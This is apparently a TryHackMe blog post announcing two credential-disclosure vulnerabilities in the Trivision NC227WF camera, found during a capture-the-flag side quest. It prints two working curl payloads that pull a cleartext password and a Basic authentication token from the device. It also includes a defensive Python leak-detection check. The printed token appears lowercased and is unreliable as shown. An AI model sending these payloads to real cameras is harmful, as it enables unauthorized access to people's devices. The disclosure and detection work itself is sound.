Sometimes, in life, side quests end up paying much better dividends than main quests.
A TryHackMe user, using the username moo, together with Andrea (h4sh3m00, Senior Content Engineer at TryHackMe) uncovered two high-impact security vulnerabilities in the Trivision Camera NC227WF with version 5.80 (build 20141010). These vulnerabilities were published very recently, with two official CVEs being raised:
The vulnerabilities were first uncovered during the Advent of Cyber 2023 Side Quest. Side Quest is a challenge reserved for advanced users who are both willing and able to go above and beyond to put their cyber knowledge to the test. After uncovering several hints, users could access the Snowy ARMaggedon room, where a hard challenge involving a Trivision Camera awaited them.
While working through the challenge, moo was able to exploit the camera in an unexpected way. After contacting Andrea through TryHackMe's support channels, they both set out to research the attack in depth, eventually discovering it was a brand new vulnerability. Now, one year and a responsible disclosure process later, we're able to share the news and how the AoC 2023 Side Quest is still generating impact in the cyber security industry!
This vulnerability exposes valid cleartext credentials due to a lack of authorization mechanisms. The exploit payload is as follows:
curl -u admin:whatever http://192.168.163.1:50628 --request-target en/player/activex_pal.asp
An attacker may be able to obtain the password in cleartext, as shown in the example: unguessable123!
Another vulnerability in the Trivision Camera NC227WF: valid Basic authentication access can be found in the response to the request.
In the following payload, we have:
curl -u admin:whatever http://192.168.163.1:50628 --request-target en/mobile/mblogin.asp
With this payload, a valid Basic authentication code (ywrtaw46vw5ndwvzc2fibguxmjmh) is leaked, which could be leveraged to gain unauthorized access: Base64 is an encoding, not encryption, so the code can be easily decoded back to the username and password.
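Both issues come down to a response body that carries a credential, either in cleartext or as a Base64 Basic authentication value. The following check is an added example, not code from the original write-up or from the vendor: it scans a captured response body for both forms, the way a firmware or web regression test might. The function name, finding labels and sample bodies are assumptions constructed for illustration.

```python
import base64
import binascii
import re

# Runs of Base64 alphabet long enough to hold a "user:password" pair.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{8,}={0,2}")
# Decoded shape of a Basic credential: printable user (no colon), colon, printable password.
USERPASS = re.compile(r"^[\x21-\x39\x3b-\x7e]{1,64}:[\x20-\x7e]{1,128}$")


def find_credential_leaks(body, known_password=None):
    """Return (kind, user) findings for credentials present in a response body.

    known_password is the password configured on the device under test (assumed
    to be known to the tester), used to catch the plain cleartext case.
    """
    findings = []
    if known_password and known_password in body:
        findings.append(("cleartext-password", None))
    for match in B64_RUN.finditer(body):
        token = match.group(0)
        if len(token) % 4:  # not a whole number of Base64 quanta
            continue
        try:
            decoded = base64.b64decode(token, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue  # ordinary word or binary blob, not a credential
        if USERPASS.match(decoded):
            # Report only the user name so the finding does not repeat the secret.
            findings.append(("basic-auth-token", decoded.split(":", 1)[0]))
    return findings


# Constructed sample responses (not captured from a real device).
SAMPLE_TOKEN = base64.b64encode(b"admin:Constructed-Pass1").decode()
TOKEN_BODY = '<script>var auth = "' + SAMPLE_TOKEN + '"; var page = "login";</script>'
CLEAR_BODY = '<param name="password" value="Constructed-Pass1">'

if __name__ == "__main__":
    for name, body in (("token", TOKEN_BODY), ("clear", CLEAR_BODY)):
        print(name, find_credential_leaks(body, "Constructed-Pass1"))
```

Any finding on a response served without valid credentials means the page needs an authorization check and must stop embedding the credential at all.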
We're incredibly excited to share just how real-world our challenges are, leading to the discovery of vulnerabilities that have a tangible impact on the cyber security industry. What started as a fun and engaging side quest has now improved security by uncovering weaknesses in a widely used device. This is exactly the kind of impact we hope for: turning hands-on learning into meaningful security research that benefits the entire industry.
Our commitment to improving cyber security education goes beyond just creating training rooms. We're dedicated to continuously pushing the boundaries of real-world security research, empowering our users to hone their skills in ways that have practical applications. Whether it's through CTFs, immersive training, or unexpected discoveries like these, we'll keep striving to make cybersecurity training both engaging and impactful.
This discovery is a testament to the power of hands-on learning and the curiosity of the TryHackMe community. We'd like to congratulate Andrea and moo on their excellent work, and we're looking forward to seeing what vulnerabilities the community uncovers next!